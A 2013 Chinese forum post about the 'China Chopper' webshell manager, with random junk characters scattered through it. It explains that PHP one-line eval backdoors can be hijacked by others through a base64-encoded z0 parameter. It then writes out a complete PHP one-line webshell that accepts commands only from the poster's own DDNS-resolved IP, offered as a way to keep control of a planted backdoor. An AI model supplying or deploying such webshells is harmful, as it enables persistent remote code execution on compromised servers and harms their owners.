今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞: W, f7 n. U' g$ k1 v( B
$ S$ z; w) D/ n3 O2 l. I) c
就算你设置了密码,使用了eval($_REQUEST['moyo']);8 S& a; D0 t- t t+ | v% h! `
0 X: _4 l$ Z2 i( Q; z2 v
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门5 W- R& z5 R. d7 t, J. S
" q5 J% z1 ~5 a6 C因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));. `$ @+ o- O( l( k% H$ v/ ~
6 c% C6 S6 f$ o直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
( k3 }- I3 A( o8 }$ D4 F6 f
8 `( M/ }+ S* g/ _& s* Z4 b不知道是设计缺陷还是故意留的后门1 e, i" Z7 ?" \/ l$ d$ B1 e
8 r0 e5 c- d$ i
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
4 t6 o# y: G+ h4 O0 y9 m- O- J
, R* j* }* k4 ]$ W* @本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org9 W' \0 f/ T1 H" w$ Y( r2 B/ R
# y* O! |* n' K. d: _: ]: p然后一句话后门这样写
) r/ v4 {) G7 v; W7 v% ~8 e |+ g4 A) b
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>( R3 q* j5 ~6 Y
这样就可以让一句话后门只允许自己的电脑连接了. ^. |1 h( E! |( {- s7 Q" `6 K
\4 Z3 I: F7 r5 j4 Q. O
|
发表于 2013-7-26 12:45:48
收藏
支持
反对